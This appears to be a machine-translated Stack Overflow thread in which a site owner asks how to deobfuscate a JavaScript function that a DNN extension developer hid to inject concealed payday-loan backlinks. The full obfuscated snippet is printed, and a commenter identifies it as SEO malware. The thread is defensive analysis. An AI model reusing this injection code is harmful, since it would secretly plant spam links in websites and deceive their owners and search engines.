一個偷偷摸摸的擴展開發者在他的擴展中對反向鏈接進行了硬編碼,現在我的客戶的網站鏈接到了「支付日貸款」網站。如何對一個隱藏的js腳本進行反向工程?
這就是神祕的腳本:
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
當我試圖找出它做什麼,我想出了用短的jsfiddle。我怎樣才能逆向工程這裏發生了什麼?
你在調試器中運行這段代碼嗎? – 2013-03-06 02:18:16
我認爲它應該是x [3]而不是x [4] – 2013-03-06 02:29:32
你沒有要求(並且我假設你知道),但是這個腳本被用於隱藏鏈接到其他人的網頁,以便鏈接被搜索引擎機器人看到,給參考頁面排名更高(SEO惡意軟件)。 [見這裏](http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html)。 – mins 2014-08-04 11:56:36